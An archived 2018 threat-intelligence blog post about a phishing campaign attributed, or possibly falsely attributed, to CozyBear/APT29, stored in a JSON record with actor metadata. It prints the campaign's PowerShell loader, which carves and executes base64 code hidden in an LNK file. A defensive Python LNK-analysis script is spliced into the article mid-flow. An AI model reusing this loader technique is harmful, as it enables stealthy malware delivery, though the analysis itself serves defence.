{
	"id": "bb135356-b4ce-43e2-bef0-970aea2d67de",
	"created_at": "2026-04-06T00:10:46.923718Z",
	"updated_at": "2026-04-10T03:37:33.419531Z",
	"deleted_at": null,
	"sha1_hash": "03b44872d273ab9d1dc4e6dd8817b248c175f65c",
	"title": "CozyBear – In from the Cold?",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 77344,
	"plain_text": "CozyBear – In from the Cold?\r\nPublished: 2018-11-18 · Archived: 2026-04-05 18:31:00 UTC\r\nOn 15 November, something long-awaited (and presumably expected) came to pass in the information security\r\ncommunity – CozyBear/APT29/CozyDuke/“The Dukes”/“Office Monkeys” were (or seemed to be) back.\r\nSubsequent reporting defined the scope of the event: a large phishing campaign on 14 November targeting\r\nmultiple organizations spanning “military agencies, law enforcement, defense contractors, media companies and\r\npharmaceutical companies,” among other entities. The campaign itself offered a number of items that screamed\r\nattribution to CozyBear – reuse of PowerShell scripting techniques from past campaigns, leveraging PowerShell-laden LNK files for initial activity, and some possible overlap in infrastructure creation. Essentially, this was\r\nalmost too easy – which means we (the cybersecurity community) should probably start asking questions.\r\nSkepticism crept in fairly early on for this event – and for good reason. Within information security and threat\r\nintelligence circles, CozyBear/APT29/Dukes/etc. is commonly perceived as the “senior partner” in Russian-linked\r\nthreats (excepting perhaps Turla). The combination of mass scale, little variation in phish/lures, and regurgitation\r\nof past tradecraft all present a curious and confounding issue: is this the same adversary, an attempt by some other\r\nentity to look like a historical adversary, or something else entirely?\r\nFrom a purely technical perspective, available evidence to this author at the time of writing indicates a very\r\nnarrow range of variation for attacker techniques. 
Phishing messages came from multiple domains but all from the\r\nsame mail server (mx1.era.citon\\.com, hosted at 216.251.161\\.198), leveraging the same theme of an\r\n“unclassified” message from the US Department of State, while using nearly identical links (as opposed to per-victim link structures to track click-throughs) for the malicious payload. Furthermore, payloads captured to date\r\nall feature an identical naming scheme – a LNK file (ds7002.lnk) dropping and launching, via various PowerShell\r\nscripts, a DLL (cyzfc.dat) to execute a variant of Cobalt Strike in memory – indicative of an almost commodity-like phishing expedition with little (if any) variation among victims. From an operational security and evasion\r\nstandpoint, this seems simply bonkers for an “advanced”, stealthy adversary. While the campaign in question\r\nleveraged a compromised mail server for delivery and a compromised web server to deliver a second stage, this still\r\nmapped to fairly static delivery and payload items, while the 2016 event used at least five different\r\n“themes” or “waves” and multiple compromised websites (albeit all with “PDF” in their name) to differentiate and\r\nthrow off detection and response.\r\nExtending further, the intrusion event progresses to the delivery of a malicious LNK file embedded in a ZIP\r\narchive – again, reminiscent of the 2016 event with its downloaded ZIPs holding double-extension files like\r\n“37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk”. Except, the 2016 campaign at least featured\r\npassword-protected ZIP files (password contained within the message) along with Office-based macro\r\ndownloaders and anti-virtualization checks. Meanwhile, the 2018 event’s anti-analysis largely hinges on file\r\nrenaming and several layers of obfuscation. 
As shown in the following code snippet, the primary defense\r\nmechanism for this intrusion is determining whether the LNK file has been renamed (as one would expect for samples\r\ndownloaded from a commercial virus database), combined with some obfuscation to defeat static analysis. The script\r\nlocates itself by its original file name, reads a fixed byte range out of its own LNK file, base64-decodes it, and\r\nexecutes the result; a renamed sample is never found and the script exits before reaching the payload:\r\nhttps://pylos.co/2018/11/18/cozybear-in-from-the-cold/\r\nPage 1 of 5\n\n# Byte range of the base64 blob carried inside the LNK, and the LNK file's original name\r\n$ptgt=0x0005e2be;$vcq=0x000623b6;$tb=\"ds7002.lnk\";\r\n# If the LNK is not in the working directory under that name, search %TEMP% for it;\r\n# a renamed copy (e.g. one pulled from a sample repository) is not found and the script exits\r\nif (-not(Test-Path $tb)){\r\n  $oe=Get-ChildItem -Path $Env:temp -Filter $tb -Recurse;\r\n  if (-not $oe){exit}\r\n  [IO.Directory]::SetCurrentDirectory($oe.DirectoryName);\r\n}\r\n# Read bytes $ptgt..$vcq straight out of the LNK file itself\r\n$vzvi=New-Object IO.FileStream $tb,'Open','Read','ReadWrite';\r\n$oe=New-Object byte[] ($vcq-$ptgt);\r\n$r=$vzvi.Seek($ptgt,[IO.SeekOrigin]::Begin);\r\n$r=$vzvi.Read($oe,0,$vcq-$ptgt);\r\n# Base64-decode them and run the result as the next PowerShell stage\r\n$oe=[Convert]::FromBase64CharArray($oe,0,$oe.Length);\r\n$zk=[Text.Encoding]::ASCII.GetString($oe);\r\niex $zk;\r\nCompared to the multiple levels of evasion and anti-analysis deployed in the 2016 event attributed to\r\nCozyBear/APT29, this would appear to be something of a regression. Of course, no “APT” or other entity ever\r\ngets “bonus points” for being more technically sophisticated or daring, but moving backwards – if only slightly –\r\ndoes seem quite strange.\r\nThis strangeness continues when it comes to network infrastructure. CozyBear malware/tool hosting and\r\ncommand and control (C2) activity includes a wide variety of techniques: from using legitimate services (such as\r\nTwitter and GitHub) to leveraging compromised, but legitimate, domains that fit the adversary’s desired naming\r\nschema. In most cases though, the entity has largely avoided the use of self-registered, attacker-owned\r\ninfrastructure following typical registration and hosting patterns – that pattern of activity belongs to\r\nFancyBear/APT28. 
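The self-locating, self-carving LNK loader quoted above is easy to describe but tedious to triage by hand. The following Python is an added example, not code from the original post or from the campaign: it parses a .lnk file according to the MS-SHLLINK layout, pulls out the COMMAND_LINE_ARGUMENTS string, matches it against the behaviours visible in the quoted script (find itself under %TEMP%, open itself as a FileStream, Seek to a fixed offset, base64-decode, iex), and carves any long base64 run that sits after the shell-link structure ends. It generalises the quoted loader's hard-coded range (0x5e2be to 0x623b6) to a scan of everything past the ExtraData terminal block, so the offsets need not be known in advance. The sample LNK, its argument string and the embedded "second stage" are constructed fixtures, the pattern names are mine, and the cp1252 fallback for non-Unicode strings is an assumption about the system code page.

```python
# Added example (not code from the original post or the campaign): parse a Windows
# shell link (.lnk, MS-SHLLINK), extract its command-line arguments, flag the
# self-locating/self-carving behaviours of the quoted loader, and carve base64 blobs
# appended after the end of the shell-link structure.
import base64
import binascii
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes([0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
                    0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46])
# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this order.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_DATA_ORDER = (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION)

# Behaviours of the quoted loader, as regexes over the argument string (names are mine).
SUSPICIOUS_PATTERNS = {
    'temp-search':   r'Get-ChildItem[^;]*Env:temp[^;]*-Recurse',  # find itself by name under %TEMP%
    'self-read':     r'IO\.FileStream',                            # open a file for raw byte reads
    'seek-offset':   r'\.Seek\(',                                  # jump to a hard-coded offset
    'base64-decode': r'FromBase64(CharArray|String)',
    'eval':          r'(?<![A-Za-z])(iex|Invoke-Expression)(?![A-Za-z])',
}
BASE64_RUN = re.compile(rb'[A-Za-z0-9+/]{64,}={0,2}')


def _u(fmt: str, data: bytes, pos: int) -> int:
    """Little-endian field read that fails cleanly on a truncated file."""
    if pos + struct.calcsize(fmt) > len(data):
        raise ValueError('truncated shell link at offset %d' % pos)
    return struct.unpack_from(fmt, data, pos)[0]


def parse_lnk(data: bytes) -> dict:
    """Walk header, IDList, LinkInfo, StringData, ExtraData; return arguments and trailing bytes."""
    if len(data) < HEADER_SIZE or _u('<I', data, 0) != HEADER_SIZE or data[4:20] != LINK_CLSID:
        raise ValueError('not a shell link file')
    flags = _u('<I', data, 0x14)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + _u('<H', data, pos)           # IDListSize excludes its own 2 bytes
    if flags & HAS_LINK_INFO:
        pos += _u('<I', data, pos)               # LinkInfoSize includes its own 4 bytes
    strings = {}
    for flag in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        count = _u('<H', data, pos)              # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        strings[flag] = raw.decode('utf-16-le' if width == 2 else 'cp1252', errors='replace')
    while pos + 4 <= len(data):                  # ExtraData: uint32 BlockSize per block
        size = _u('<I', data, pos)
        pos += 4 if size < 4 else size           # a size below 4 is the TerminalBlock
        if size < 4:
            break
    return {'arguments': strings.get(HAS_ARGUMENTS, ''), 'structure_end': pos, 'trailing': data[pos:]}


def score_arguments(arguments: str) -> list:
    return [name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, arguments, re.IGNORECASE)]


def carve_trailing_base64(trailing: bytes) -> list:
    """Decode every long base64 run after the structure; no fixed offsets needed."""
    stages = []
    for m in BASE64_RUN.finditer(trailing):
        chunk = m.group(0)
        chunk = chunk[:len(chunk) - len(chunk) % 4]  # strict decoding wants whole 4-char quanta
        try:
            stages.append(base64.b64decode(chunk, validate=True))
        except binascii.Error:
            continue
    return stages


def analyze(data: bytes) -> dict:
    info = parse_lnk(data)
    hits = score_arguments(info['arguments'])
    stages = carve_trailing_base64(info['trailing'])
    verdict = 'self-carving loader' if hits and stages else 'suspicious' if hits or info['trailing'] else 'clean'
    return {'arguments': info['arguments'], 'suspicious': hits, 'structure_end': info['structure_end'],
            'trailing_bytes': len(info['trailing']), 'stages': stages, 'verdict': verdict}


def build_sample_lnk(arguments: str, appended: bytes) -> bytes:
    """Constructed fixture, not the campaign's ds7002.lnk: header, COMMAND_LINE_ARGUMENTS, TerminalBlock, payload."""
    header = struct.pack('<I', HEADER_SIZE) + LINK_CLSID + struct.pack('<I', HAS_ARGUMENTS | IS_UNICODE)
    header += bytes(HEADER_SIZE - len(header))   # attributes, timestamps, icon etc. left zero
    string_data = struct.pack('<H', len(arguments)) + arguments.encode('utf-16-le')
    return header + string_data + struct.pack('<I', 0) + appended


# Constructed argument string modelled on the quoted loader (variable names shortened).
SAMPLE_ARGS = ("powershell -c $tb='ds7002.lnk';if(-not(Test-Path $tb)){$oe=Get-ChildItem -Path $Env:temp"
               " -Filter $tb -Recurse;if(-not $oe){exit}};$s=New-Object IO.FileStream $tb,'Open';"
               "$r=$s.Seek($p,[IO.SeekOrigin]::Begin);iex ([Text.Encoding]::ASCII.GetString("
               "[Convert]::FromBase64CharArray($b,0,$b.Length)))")
SAMPLE_STAGE2 = b'Write-Output constructed-second-stage-placeholder-text-01'  # constructed payload
SAMPLE_LNK = build_sample_lnk(SAMPLE_ARGS, base64.b64encode(SAMPLE_STAGE2))

if __name__ == '__main__':
    print(analyze(SAMPLE_LNK))
```

To use it on a suspect file, read its bytes and pass them to analyze(). The structure_end offset shows where legitimate shell-link data stops; anything non-trivial after it is worth a look regardless of what the argument string says, because the loader's rename check only matters if the file still executes under its original name, and the appended bytes are there either way.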
It is notable that the SSL/TLS certificate associated with the C2 domain for the recent\r\ncampaign (pandorasong\\.com) moves away from the certificate pattern previously observed in past FancyBear\r\noperations, but we can probably assume the group looked to change previous patterns following the\r\nThreatConnect report linked previously. In some respects, one could say this campaign blended aspects of Cozy\r\nand FancyBear for infrastructure purposes – which would seem to be indicative of a third party attempting to\r\nemulate the techniques of others (and confusing their bears).\r\nSo the question becomes – what now? Overall, from a purely behavior-based perspective, the activity observed\r\nmatches what CozyBear/APT29 looked like at one point in time: delivery and initial exploitation/installation all\r\nreflect items observed for the past two (or more) years, in various respects. Yet such a view assumes that\r\nCozyBear remained static in tactics, techniques, and procedures (TTPs) through this extended period of little (or\r\nno) observed activity – which seems unlikely, if not fanciful. Even assuming that the personas behind\r\nCozyBear/APT29 are lazy and merely desire to be “good enough” to achieve mission success, remaining\r\ncompletely static in terms of general TTPs for two years appears to be careless at best, and career suicide at worst.\r\nTo distill matters to a fairly basic level, we are left with two choices: either CozyBear has remained static in terms\r\nof TTPs and tradecraft for an extended period of time, or the recent activity represents another entity working to\r\nmimic CozyBear-like activity based on the last widely-observed campaigns attributed to this entity. 
One could\r\nalso argue for a third possibility: that this is an elaborate “double-fake” of CozyBear pulling off a brief campaign\r\nwith a poor version of the group’s old TTPs to make people think this is actually some other entity.\r\nLet’s start with the first possibility: Cozy just got kind of… cozy. Why bother innovating if the same old things\r\nstill work? For what it is worth, the methodology deployed is still rather effective: using a legitimate source for\r\nphishing messages and hosting initial payloads on a compromised server avoids reputation issues on “new”\r\ninfrastructure. Traffic is all wrapped in HTTPS, which leaves most network security monitoring (NSM) with little\r\nbeyond metadata, except in those rare instances where organizations break SSL/TLS connections. The payload\r\nitself reasonably evaded detection – while VirusTotal engines are not necessarily the “latest and greatest” for\r\ncommercial AV detections, looking at both the LNK file (3 detections on 14 November, all fairly generic and none\r\nfrom the major vendors) and the DLL (4 detections on 14 November, interestingly enough mostly from machine\r\nlearning-based solutions) these “recycled” TTPs seem pretty effective. Accepting the assumption that no one gets\r\nbonus points for “style”, why wouldn’t CozyBear simply use legacy – but still effective – tradecraft instead of\r\nspending cycles and resources to develop (and then burn) new capabilities? Of course, this still leaves some other\r\noddities out there: the timing (strikingly similar, if not identical, to the post-US-election campaign from 2016), the\r\nexpanded targeting (the entity has largely focused on political/military/government targets previously), and the\r\nmigration to a modified publicly-available post-exploitation framework. 
Essentially, there are enough data points\r\non either side of the argument to make coming to a definitive conclusion quite difficult.\r\nGiven this uncertainty, our second possibility is certainly within scope: TTPs (including code samples and other\r\nartifacts) from 2016 events are publicly available, along with the basis (Cobalt Strike framework) for post-exploitation activity. Unlike compiled binaries, for which source code is usually unavailable, script-based tradecraft\r\nand technical items from the 2016 CozyBear events can be captured by any suitably skilled adversary, modified\r\nslightly, and reused in another campaign. The wide net cast by this campaign and lack of significant variation in phishing\r\nmessages and malicious links hint at something less sophisticated than past CozyBear behavior (and perhaps a\r\n“rushed” operation) while the relative ease with which the various payloads can be analyzed up to final post-exploitation stages (compared to the anti-virtualization and anti-analysis checks used in past activity) would\r\nseemingly indicate a similar but not-quite-the-same activity. But based on what was stated in the last paragraph,\r\nwhy does CozyBear (or any adversary) need to keep “pushing the envelope” and innovating if recycled versions\r\nof relatively old TTPs can still be effective? In other words, just because TTPs are recycled doesn’t mean this is\r\nanother entity repurposing CozyBear TTPs. While many might take the stand that analysts are obligated to prove\r\nthat the activity aligns to CozyBear, we must equally consider the requirement to prove that such activity aligns to\r\nanother, unknown entity – which is, in many respects, a very hard case to make given the increased uncertainty\r\n(just who would do this?) surrounding this possibility. 
Ultimately, the “false flag” narrative seems plausible, but is\r\nnot overwhelmingly likely given available information.\r\nSo what of our third possibility – the “three-dimensional chess” situation where CozyBear acts like a facsimile of\r\nitself to lull others into thinking this is some sort of false flag operation when really this aligns to something more?\r\nSeveral tweets and private discussions offer some justification for this, along with past observations of\r\nCozyBear activity using “noisy” events to hide more selective and targeted activity. This is certainly very\r\nplausible, and given the breadth of phishing activity and the response – much of the security community and\r\nrelevant press was very quick to react and devote significant resources to the event – this seems a potentially\r\npowerful misdirection tactic. Similar to an overzealous immune response, the reaction to “obvious” indicators of\r\nmalicious behavior associated with a high-profile adversary can easily be used to either mask other operations,\r\nlure responders to reallocate resources from one investigation (say, the “true” CozyBear target) to chasing the\r\npublic event of the moment, or some other scenario fitting within the concepts of military deception. Yet all of\r\nthese fail Occam’s razor in terms of simplicity and elegance – that doesn’t mean this theory is incorrect, but the\r\nburden of proof to make this case could be considered higher than other, more direct scenarios. So while this is an\r\nextremely enticing theory, this also appears (in my opinion) to be the one where “making the case” (absent direct\r\nevidence from a victim environment) is most difficult.\r\nSo we have covered several possibilities for just where this activity may have originated – based on the evidence\r\nat hand, can we find one that appears stronger or more likely than the rest? 
Unfortunately for those seeking a\r\ndefinitive selection between the above choices, not only can I not make a definitive, evidence-based decision\r\nbetween them, but an overview of available data and commentary indicates that no one else can either – or if\r\nthey can, they’re not telling anyone outside of a (very high) paywall. Quite simply: this campaign is worrying in\r\nscope, perceived intention, and potential attribution – but the oddity of TTP recycling and “shotgun” targeting for\r\na perceived “advanced” and skilled actor is not merely striking, but off-putting. Furthermore, we have recently\r\nobserved increased efforts by state-linked threats to mimic other state-linked threats. Based on the current threat\r\nlandscape, all of the above seem quite plausible, if not equally likely.\r\nFrom my perspective, we (network defenders and threat intelligence analysts) are left at a loss in the immediate\r\nterm without more evidence – up to and including the sort most often associated with spooky three-letter agencies\r\nin the greater Washington, DC area (although the Dutch are giving these entities a run for their money). Short of\r\nhaving a glimpse of who is actually “on keyboard” and similar such nuggets, piercing the fog surrounding this\r\nevent will be painful and time-consuming – and even then, dependent upon not a little bit of luck at finding just\r\nthe right pieces of evidence to make a solid technical case to support one of the above scenarios.\r\nThe next question for me then is: should we be concerned about faulty or incomplete attribution based on the\r\nconfusing aspects of this case from a defensive perspective? Well, if you have followed my past thoughts on the\r\npractice of threat intelligence and attribution, the answer for the vast majority of network defenders is: no. 
There\r\nare definitely exceptions to this – both in terms of organizations (governments and national security personnel\r\ncertainly want to know “who’s responsible?”) and sometimes defensive or response goals. Thus for some entities\r\nthere will be great value in going down the “rabbit hole” of attempting to determine with accuracy what entity is\r\nresponsible for the event in question – and it also just so happens that these entities typically have both the\r\nresources and information sources required to pursue this line of inquiry. But ultimately – this work will take time,\r\neffort, and resources, several (or all) of which most organizations (including those targeted in this event) simply\r\ndo not have in abundance.\r\nFor the rest of us, whether CozyBear or FancyBear or some sort of Panda or APTxx is responsible not only\r\ndoesn’t materially matter for immediate defensive needs, but it may even prove to be a critical distraction. Instead,\r\nwe can look at the fundamental behaviors exhibited in this campaign, and utilize these for an immediate response\r\nagainst initial intrusion activity. Separate from that… what else do we, as “on the ground”, front-line defenders,\r\nreally need to know? Irrespective of whether this is CozyBear or some other entity, the activity is without question\r\nmalicious. Whether a mass campaign by an adversary or a feint designed to distract from something else, the goals\r\nand requirements for conducting network defense and response remain the same: identify the target, determine\r\nscope of breach, and remediate to a known-good state within the defended network. 
We as a community can spend\r\nan inordinate amount of time discussing just how many angels can dance on the head of this pin when it comes to\r\nattribution – but at the end of the day, aside from a select few of us in very particular circumstances, it just doesn’t\r\nmatter.\r\nSome of you will read this and view my conclusion as some sort of “cop out” from actually solving the perceived\r\nproblem of, “Is CozyBear back, and if so why?” Yet I actually find the position adopted here to be the more\r\ngruelling one to embrace and defend, because our inclination as human beings, with our penchant for retributive\r\njustice, cries out to identify, “WHO IS RESPONSIBLE?” Unfortunately, once one adopts a position that recognizes not\r\njust what matters in the immediate sense of network defense operations but also the limits of what we\r\ncan (definitively) know about the intent and authorship of such actions (barring mind-numbingly bad operational\r\nsecurity failures), that desire will more often than not crash upon the rocks of uncertainty. Essentially – working\r\nwith imperfect knowledge, and possessing limited resources to address various gaps in such knowledge, what\r\nshould we, as information security professionals defending networks or clients, prioritize?\r\nI would stridently argue that identifying “who” is responsible and precisely “why” represent academic questions –\r\ninteresting and potentially valuable in limited circumstances, but sufficiently divorced from everyday\r\nrequirements as to make them superfluous and distracting. Rather, aside from ascertaining a broad sense of intent\r\n(Ransom? Theft? Disruption or destruction?), the goal of defenders (including those operating within the specialist\r\nfield of threat intelligence) is to identify the attack vector and its technical, provable implications, and then\r\ndetermine the means to defeat and roll back the intrusion. 
This more limited approach takes into consideration not\r\nmerely what is immediately (and concretely) actionable, but also what is knowable given the information both at\r\nhand and reasonably discoverable.\r\nSo to circle back to the title of this post – is CozyBear “in” from the cold? Quite frankly: I don’t care. Someone is\r\ncertainly active and adopting TTPs reflecting past activity associated with CozyBear – which in many respects is\r\nan unalloyed “good thing” as we can easily identify and trace various aspects of the initial intrusion event. Beyond\r\nthis, it is imperative for defenders to continue monitoring this activity to determine just what the next stages of\r\naction are for this campaign and the implications of the post-exploitation technique adopted for the event. But\r\nbeyond these concrete, technical items, we enter into a morass of speculation, uncertainty, and (even when\r\nsufficient information is at hand) academic declaration so far divorced from the needs of information security as to\r\nmake an emphasis on “who”-based discovery in this instance almost negligent in light of primary duties. Thus, my\r\ntake-away for this event, and all the attention it has received thus far, is to treat it seriously given it is a wide-ranging intrusion attempt deploying effective (if aged) methods for initial intrusion – and go no further.\r\nGovernments, researchers, and various other persons will spend many cycles trying to burrow into this event to\r\ndiscover its secrets – but while they do so, those devoted to monitoring, defending, and (when necessary)\r\nrecovering networks should focus on primary goals: defeating intrusions, no matter where they emanate from, or\r\nwho is responsible.\r\nSource: https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://pylos.co/2018/11/18/cozybear-in-from-the-cold/"
	],
	"report_names": [
		"cozybear-in-from-the-cold"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf",
			"created_at": "2022-10-25T16:07:24.467088Z",
			"updated_at": "2026-04-10T02:00:05.000485Z",
			"deleted_at": null,
			"main_name": "Circles",
			"aliases": [],
			"source_name": "ETDA:Circles",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
